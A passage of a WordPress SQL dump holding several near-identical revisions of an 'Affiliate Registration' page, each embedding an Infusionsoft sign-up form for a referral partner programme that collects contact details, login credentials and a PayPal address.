*</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Username">Username *</label>\r\n\r\n<input id="inf_other_Username" class="infusion-field-input-container" name="inf_other_Username" type="text" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Password">Password *</label>\r\n\r\n<input id="inf_other_Password" class="infusion-field-input-container" name="inf_other_Password" type="password" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_RetypePassword">Confirm Password *</label>\r\n\r\n<input id="inf_other_RetypePassword" class="infusion-field-input-container" name="inf_other_RetypePassword" type="password" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<table>\r\n<tr>\r\n<td><label for="inf_other_NotifyOnLead">Notify on Lead</label></td><td><input id="inf_other_NotifyOnLead_1" name="inf_other_NotifyOnLead" type="radio" value="1" /><label for="inf_other_NotifyOnLead_1">Yes</label></td>\r\n<td><input id="inf_other_NotifyOnLead_0" name="inf_other_NotifyOnLead" type="radio" value="0" /><label for="inf_other_NotifyOnLead_0">No</label></td>\r\n</tr>\r\n<tr>\r\n<td><label for="inf_other_NotifyOnSale">Notify on Sale</label></td><td><input id="inf_other_NotifyOnSale_1" name="inf_other_NotifyOnSale" type="radio" value="1" /><label for="inf_other_NotifyOnSale_1">Yes</label></td>\r\n<td><input id="inf_other_NotifyOnSale_0" name="inf_other_NotifyOnSale" type="radio" value="0" /><label for="inf_other_NotifyOnSale_0">No</label></td>\r\n</tr>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<table>\r\n<tr>\r\n<div class="infusion-field">\r\n\r\n<td width="15%"><input id="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" checked="checked" name="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" type="checkbox" value="976" style="float:right;" /></td>\r\n\r\n<td><label for="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow">Please Mail My Commission Payment to the Paypal Email Address Below:</label></td>\r\n\r\n</div>\r\n</tr>\r\n<tr>\r\n<div class="infusion-field">\r\n\r\n<td>\r\n<tr>\r\n<td></td>\r\n<td><input id="inf_custom_PaypalEmailAddress" class="infusion-field-input-container" name="inf_custom_PaypalEmailAddress" type="text" /></td>\r\n\r\n</div>\r\n</tr>\r\n</table>\r\n<div class="infusion-submit" style="float:right;">\r\n\r\n<input type="submit" value="Register!" />\r\n\r\n</div>\r\n</form></div>', 'Affiliate Area', '', 'inherit', 'closed', 'open', '', '928-revision-v1', '', '', '2014-07-12 16:19:32', '2014-07-12 21:19:32', '', 928, 'http://clearyourbeliefs.com/928-revision-v1', 0, 'revision', '', 0),
(1280, 4194, '2014-07-12 16:21:30', '2014-07-12 21:21:30', '<h1 style="text-align: center;">Affiliate Registration</h1>\r\n<div class="icon_box style="><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/3f71c00a94d36f3139b9a849b793215b" method="POST"><input name="inf_form_xid" type="hidden" value="3f71c00a94d36f3139b9a849b793215b" /><input name="inf_form_name" type="hidden" value="CYB Referall Partner Registration" /><input name="infusionsoft_version" type="hidden" value="1.31.0.33" />\r\n<table border="0">\r\n<tr>\r\n<td border="0">\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Username">Username *</label>\r\n\r\n<input id="inf_other_Username" class="infusion-field-input-container" name="inf_other_Username" type="text" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Password">Password *</label>\r\n\r\n<input id="inf_other_Password" class="infusion-field-input-container" name="inf_other_Password" type="password" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_RetypePassword">Confirm Password *</label>\r\n\r\n<input id="inf_other_RetypePassword" class="infusion-field-input-container" name="inf_other_RetypePassword" type="password" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<table border="0">\r\n<tr>\r\n<td><label for="inf_other_NotifyOnLead">Notify on Lead</label></td><td><input id="inf_other_NotifyOnLead_1" name="inf_other_NotifyOnLead" type="radio" value="1" /><label for="inf_other_NotifyOnLead_1">Yes</label></td>\r\n<td><input id="inf_other_NotifyOnLead_0" name="inf_other_NotifyOnLead" type="radio" value="0" /><label for="inf_other_NotifyOnLead_0">No</label></td>\r\n</tr>\r\n<tr>\r\n<td><label for="inf_other_NotifyOnSale">Notify on Sale</label></td><td><input id="inf_other_NotifyOnSale_1" name="inf_other_NotifyOnSale" type="radio" value="1" /><label for="inf_other_NotifyOnSale_1">Yes</label></td>\r\n<td><input id="inf_other_NotifyOnSale_0" name="inf_other_NotifyOnSale" type="radio" value="0" /><label for="inf_other_NotifyOnSale_0">No</label></td>\r\n</tr>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<table border="0">\r\n<tr>\r\n<div class="infusion-field">\r\n\r\n<td width="15%"><input id="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" checked="checked" name="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" type="checkbox" value="976" style="float:right;" /></td>\r\n\r\n<td><label for="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow">Please Mail My Commission Payment to the Paypal Email Address Below:</label></td>\r\n\r\n</div>\r\n</tr>\r\n<tr>\r\n<div class="infusion-field">\r\n\r\n<td>\r\n<tr>\r\n<td></td>\r\n<td><input id="inf_custom_PaypalEmailAddress" class="infusion-field-input-container" name="inf_custom_PaypalEmailAddress" type="text" /></td>\r\n\r\n</div>\r\n</tr>\r\n</table>\r\n</td>\r\n</tr>\r\n</table>\r\n<div class="infusion-submit" style="float:right;">\r\n\r\n<input type="submit" value="Register!" />\r\n\r\n</div>\r\n</form></div>', 'Affiliate Area', '', 'inherit', 'closed', 'open', '', '928-revision-v1', '', '', '2014-07-12 16:21:30', '2014-07-12 21:21:30', '', 928, 'http://clearyourbeliefs.com/928-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1281, 4194, '2014-07-12 16:22:32', '2014-07-12 21:22:32', '<h1 style="text-align: center;">Affiliate Registration</h1>\r\n<div class="icon_box style="><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/3f71c00a94d36f3139b9a849b793215b" method="POST"><input name="inf_form_xid" type="hidden" value="3f71c00a94d36f3139b9a849b793215b" /><input name="inf_form_name" type="hidden" value="CYB Referall Partner Registration" /><input name="infusionsoft_version" type="hidden" value="1.31.0.33" />\r\n<table border="0">\r\n<tr>\r\n<td border="0">\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Username">Username *</label>\r\n\r\n<input id="inf_other_Username" class="infusion-field-input-container" name="inf_other_Username" type="text" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Password">Password *</label>\r\n\r\n<input id="inf_other_Password" class="infusion-field-input-container" name="inf_other_Password" type="password" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_RetypePassword">Confirm Password *</label>\r\n\r\n<input id="inf_other_RetypePassword" class="infusion-field-input-container" name="inf_other_RetypePassword" type="password" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<table border="0">\r\n<tr>\r\n<td><label for="inf_other_NotifyOnLead">Notify on Lead</label></td><td><input id="inf_other_NotifyOnLead_1" name="inf_other_NotifyOnLead" type="radio" value="1" /><label for="inf_other_NotifyOnLead_1">Yes</label></td>\r\n<td><input id="inf_other_NotifyOnLead_0" name="inf_other_NotifyOnLead" type="radio" value="0" /><label for="inf_other_NotifyOnLead_0">No</label></td>\r\n</tr>\r\n<tr>\r\n<td><label for="inf_other_NotifyOnSale">Notify on Sale</label></td><td><input id="inf_other_NotifyOnSale_1" name="inf_other_NotifyOnSale" type="radio" value="1" /><label for="inf_other_NotifyOnSale_1">Yes</label></td>\r\n<td><input id="inf_other_NotifyOnSale_0" name="inf_other_NotifyOnSale" type="radio" value="0" /><label for="inf_other_NotifyOnSale_0">No</label></td>\r\n</tr>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<table border="0">\r\n<tr>\r\n<div class="infusion-field">\r\n\r\n<td width="15%"><input id="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" checked="checked" name="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" type="checkbox" value="976" style="float:right;" /></td>\r\n\r\n<td><label for="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow">Please Mail My Commission Payment to the Paypal Email Address Below:</label></td>\r\n\r\n</div>\r\n</tr>\r\n<tr>\r\n<div class="infusion-field">\r\n\r\n<td>\r\n<tr>\r\n<td></td>\r\n<td><input id="inf_custom_PaypalEmailAddress" class="infusion-field-input-container" name="inf_custom_PaypalEmailAddress" type="text" /></td>\r\n\r\n</div>\r\n</tr>\r\n</table>\r\n</td>\r\n</tr>\r\n\r\n<div class="infusion-submit" style="float:right;">\r\n\r\n<input type="submit" value="Register!" />\r\n\r\n</div>\r\n</table>\r\n</form></div>', 'Affiliate Area', '', 'inherit', 'closed', 'open', '', '928-revision-v1', '', '', '2014-07-12 16:22:32', '2014-07-12 21:22:32', '', 928, 'http://clearyourbeliefs.com/928-revision-v1', 0, 'revision', '', 0),
(1282, 4194, '2014-07-12 16:23:56', '2014-07-12 21:23:56', '<h1 style="text-align: center;">Affiliate Registration</h1>\r\n<div class="icon_box style="><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/3f71c00a94d36f3139b9a849b793215b" method="POST"><input name="inf_form_xid" type="hidden" value="3f71c00a94d36f3139b9a849b793215b" /><input name="inf_form_name" type="hidden" value="CYB Referall Partner Registration" /><input name="infusionsoft_version" type="hidden" value="1.31.0.33" />\r\n<table border="0">\r\n<tr>\r\n<td border="0">\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Username">Username *</label>\r\n\r\n<input id="inf_other_Username" class="infusion-field-input-container" name="inf_other_Username" type="text" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Password">Password *</label>\r\n\r\n<input id="inf_other_Password" class="infusion-field-input-container" name="inf_other_Password" type="password" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_RetypePassword">Confirm Password *</label>\r\n\r\n<input id="inf_other_RetypePassword" class="infusion-field-input-container" name="inf_other_RetypePassword" type="password" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<table border="0">\r\n<tr>\r\n<td><label for="inf_other_NotifyOnLead">Notify on Lead</label></td><td><input id="inf_other_NotifyOnLead_1" name="inf_other_NotifyOnLead" type="radio" value="1" /><label for="inf_other_NotifyOnLead_1">Yes</label></td>\r\n<td><input id="inf_other_NotifyOnLead_0" name="inf_other_NotifyOnLead" type="radio" value="0" /><label for="inf_other_NotifyOnLead_0">No</label></td>\r\n</tr>\r\n<tr>\r\n<td><label for="inf_other_NotifyOnSale">Notify on Sale</label></td><td><input id="inf_other_NotifyOnSale_1" name="inf_other_NotifyOnSale" type="radio" value="1" /><label for="inf_other_NotifyOnSale_1">Yes</label></td>\r\n<td><input id="inf_other_NotifyOnSale_0" name="inf_other_NotifyOnSale" type="radio" value="0" /><label for="inf_other_NotifyOnSale_0">No</label></td>\r\n</tr>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<table border="0">\r\n<tr>\r\n<div class="infusion-field">\r\n\r\n<td width="15%"><input id="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" checked="checked" name="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" type="checkbox" value="976" style="float:right;" /></td>\r\n\r\n<td><label for="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow">Please Mail My Commission Payment to the Paypal Email Address Below:</label></td>\r\n\r\n</div>\r\n</tr>\r\n<tr>\r\n<div class="infusion-field">\r\n\r\n<td>\r\n<tr>\r\n<td></td>\r\n<td><input id="inf_custom_PaypalEmailAddress" class="infusion-field-input-container" name="inf_custom_PaypalEmailAddress" type="text" /></td>\r\n\r\n</div>\r\n</tr>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<div class="infusion-submit" style="float:right;">\r\n\r\n<input type="submit" value="Register!" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n</table>\r\n</form></div>', 'Affiliate Area', '', 'inherit', 'closed', 'open', '', '928-revision-v1', '', '', '2014-07-12 16:23:56', '2014-07-12 21:23:56', '', 928, 'http://clearyourbeliefs.com/928-revision-v1', 0, 'revision', '', 0),
(1283, 4194, '2014-07-12 16:25:03', '2014-07-12 21:25:03', '<h1 style="text-align: center;">Affiliate Registration</h1>\r\n<div class="icon_box style="><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/3f71c00a94d36f3139b9a849b793215b" method="POST"><input name="inf_form_xid" type="hidden" value="3f71c00a94d36f3139b9a849b793215b" /><input name="inf_form_name" type="hidden" value="CYB Referall Partner Registration" /><input name="infusionsoft_version" type="hidden" value="1.31.0.33" />\r\n<table border="0">\r\n<tr>\r\n<td border="0">\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Username">Username *</label>\r\n\r\n<input id="inf_other_Username" class="infusion-field-input-container" name="inf_other_Username" type="text" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Password">Password *</label>\r\n\r\n<input id="inf_other_Password" class="infusion-field-input-container" name="inf_other_Password" type="password" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_RetypePassword">Confirm Password *</label>\r\n\r\n<input id="inf_other_RetypePassword" class="infusion-field-input-container" name="inf_other_RetypePassword" type="password" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<table border="0">\r\n<tr>\r\n<td><label for="inf_other_NotifyOnLead">Notify on Lead</label></td><td><input id="inf_other_NotifyOnLead_1" name="inf_other_NotifyOnLead" type="radio" value="1" /><label for="inf_other_NotifyOnLead_1">Yes</label></td>\r\n<td><input id="inf_other_NotifyOnLead_0" name="inf_other_NotifyOnLead" type="radio" value="0" /><label for="inf_other_NotifyOnLead_0">No</label></td>\r\n</tr>\r\n<tr>\r\n<td><label for="inf_other_NotifyOnSale">Notify on Sale</label></td><td><input id="inf_other_NotifyOnSale_1" name="inf_other_NotifyOnSale" type="radio" value="1" /><label for="inf_other_NotifyOnSale_1">Yes</label></td>\r\n<td><input id="inf_other_NotifyOnSale_0" name="inf_other_NotifyOnSale" type="radio" value="0" /><label for="inf_other_NotifyOnSale_0">No</label></td>\r\n</tr>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<table border="0">\r\n<tr>\r\n<div class="infusion-field">\r\n\r\n<td width="15%"><input id="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" checked="checked" name="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" type="checkbox" value="976" style="float:right;" /></td>\r\n\r\n<td><label for="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow">Please Mail My Commission Payment to the Paypal Email Address Below:</label></td>\r\n\r\n</div>\r\n</tr>\r\n<tr>\r\n<div class="infusion-field">\r\n\r\n<td>\r\n<tr>\r\n<td></td>\r\n<td><input id="inf_custom_PaypalEmailAddress" class="infusion-field-input-container" name="inf_custom_PaypalEmailAddress" type="text" /></td>\r\n\r\n</div>\r\n</tr>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<div class="infusion-submit" style="float:right;">\r\n\r\n<input class="btn" type="submit" value="Register!" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n</table>\r\n</form></div>', 'Affiliate Area', '', 'inherit', 'closed', 'open', '', '928-revision-v1', '', '', '2014-07-12 16:25:03', '2014-07-12 21:25:03', '', 928, 'http://clearyourbeliefs.com/928-revision-v1', 0, 'revision', '', 0),
(1284, 4194, '2014-07-12 18:55:52', '2014-07-12 23:55:52', '<h1 style="text-align: center;">Affiliate Registration</h1>\r\n<div class="icon_box style="><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/3f71c00a94d36f3139b9a849b793215b" method="POST"><input name="inf_form_xid" type="hidden" value="3f71c00a94d36f3139b9a849b793215b" /><input name="inf_form_name" type="hidden" value="CYB Referall Partner Registration" /><input name="infusionsoft_version" type="hidden" value="1.31.0.33" />\r\n<table border="0">\r\n<tr>\r\n<td border="0" width="47%">\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n</td>\r\n<td width="47%">\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Username">Username *</label>\r\n\r\n<input id="inf_other_Username" class="infusion-field-input-container" name="inf_other_Username" type="text" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Password">Password *</label>\r\n\r\n<input id="inf_other_Password" class="infusion-field-input-container" name="inf_other_Password" type="password" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_RetypePassword">Confirm Password *</label>\r\n\r\n<input id="inf_other_RetypePassword" class="infusion-field-input-container" name="inf_other_RetypePassword" type="password" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<table border="0">\r\n<tr>\r\n<td><label for="inf_other_NotifyOnLead">Notify on Lead</label></td><td><input id="inf_other_NotifyOnLead_1" name="inf_other_NotifyOnLead" type="radio" value="1" /><label for="inf_other_NotifyOnLead_1">Yes</label></td>\r\n<td><input id="inf_other_NotifyOnLead_0" name="inf_other_NotifyOnLead" type="radio" value="0" /><label for="inf_other_NotifyOnLead_0">No</label></td>\r\n</tr>\r\n<tr>\r\n<td><label for="inf_other_NotifyOnSale">Notify on Sale</label></td><td><input id="inf_other_NotifyOnSale_1" name="inf_other_NotifyOnSale" type="radio" value="1" /><label for="inf_other_NotifyOnSale_1">Yes</label></td>\r\n<td><input id="inf_other_NotifyOnSale_0" name="inf_other_NotifyOnSale" type="radio" value="0" /><label for="inf_other_NotifyOnSale_0">No</label></td>\r\n</tr>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<table border="0">\r\n<tr>\r\n<div class="infusion-field">\r\n\r\n<td width="15%"><input id="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" checked="checked" name="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" type="checkbox" value="976" style="float:right;" /></td>\r\n\r\n<td><label for="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow">Please Mail My Commission Payment to the Paypal Email Address Below:</label></td>\r\n\r\n</div>\r\n</tr>\r\n<tr>\r\n<div class="infusion-field">\r\n\r\n<td>\r\n<tr>\r\n<td></td>\r\n<td><input id="inf_custom_PaypalEmailAddress" class="infusion-field-input-container" name="inf_custom_PaypalEmailAddress" type="text" /></td>\r\n\r\n</div>\r\n</tr>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<div class="infusion-submit" style="float:right;">\r\n\r\n<input class="btn" type="submit" value="Register!" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n</table>\r\n</form></div>', 'Affiliate Area', '', 'inherit', 'closed', 'open', '', '928-revision-v1', '', '', '2014-07-12 18:55:52', '2014-07-12 23:55:52', '', 928, 'http://clearyourbeliefs.com/928-revision-v1', 0, 'revision', '', 0),
(1285, 4194, '2014-07-12 18:59:52', '2014-07-12 23:59:52', '<h1 style="text-align: center;">Affiliate Registration</h1>\r\n<div class="icon_box style="><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/3f71c00a94d36f3139b9a849b793215b" method="POST"><input name="inf_form_xid" type="hidden" value="3f71c00a94d36f3139b9a849b793215b" /><input name="inf_form_name" type="hidden" value="CYB Referall Partner Registration" /><input name="infusionsoft_version" type="hidden" value="1.31.0.33" />\r\n<table border="0">\r\n<tr>\r\n<td border="0" width="47%">\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n</td>\r\n<td width="47%">\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Username">Username *</label>\r\n\r\n<input id="inf_other_Username" class="infusion-field-input-container" name="inf_other_Username" type="text" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_Password">Password *</label>\r\n\r\n<input id="inf_other_Password" class="infusion-field-input-container" name="inf_other_Password" type="password" />\r\n\r\n</div>\r\n</td>\r\n<td>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_other_RetypePassword">Confirm Password *</label>\r\n\r\n<input id="inf_other_RetypePassword" class="infusion-field-input-container" name="inf_other_RetypePassword" type="password" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<table border="0">\r\n<tr>\r\n<td width="47%"><label for="inf_other_NotifyOnLead">Notify on Lead</label></td><td width="22%"><input id="inf_other_NotifyOnLead_1" name="inf_other_NotifyOnLead" type="radio" value="1" /><label for="inf_other_NotifyOnLead_1">Yes</label></td>\r\n<td width="22%"><input id="inf_other_NotifyOnLead_0" name="inf_other_NotifyOnLead" type="radio" value="0" /><label for="inf_other_NotifyOnLead_0">No</label></td>\r\n</tr>\r\n<tr>\r\n<td><label for="inf_other_NotifyOnSale">Notify on Sale</label></td><td><input id="inf_other_NotifyOnSale_1" name="inf_other_NotifyOnSale" type="radio" value="1" /><label for="inf_other_NotifyOnSale_1">Yes</label></td>\r\n<td><input id="inf_other_NotifyOnSale_0" name="inf_other_NotifyOnSale" type="radio" value="0" /><label for="inf_other_NotifyOnSale_0">No</label></td>\r\n</tr>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<table border="0">\r\n<tr>\r\n<div class="infusion-field">\r\n\r\n<td width="15%"><input id="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" checked="checked" name="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow" type="checkbox" value="976" style="float:right;" /></td>\r\n\r\n<td><label for="inf_option_PleaseMailMyCommissionPaymenttothePaypalEmailAddressBelow">Please Mail My Commission Payment to the Paypal Email Address Below:</label></td>\r\n\r\n</div>\r\n</tr>\r\n<tr>\r\n<div class="infusion-field">\r\n\r\n<td>\r\n<tr>\r\n<td></td>\r\n<td><input id="inf_custom_PaypalEmailAddress" class="infusion-field-input-container" name="inf_custom_PaypalEmailAddress" type="text" /></td>\r\n\r\n</div>\r\n</tr>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan="2">\r\n<div class="infusion-submit" style="float:right;">\r\n\r\n<input class="btn" type="submit" value="Register!" />\r\n\r\n</div>\r\n</td>\r\n</tr>\r\n</table>\r\n</form></div>', 'Affiliate Area', '', 'inherit', 'closed', 'open', '', '928-revision-v1', '', '', '2014-07-12 18:59:52', '2014-07-12 23:59:52', '', 928, 'http://clearyourbeliefs.com/928-revision-v1', 0, 'revision', '', 0),
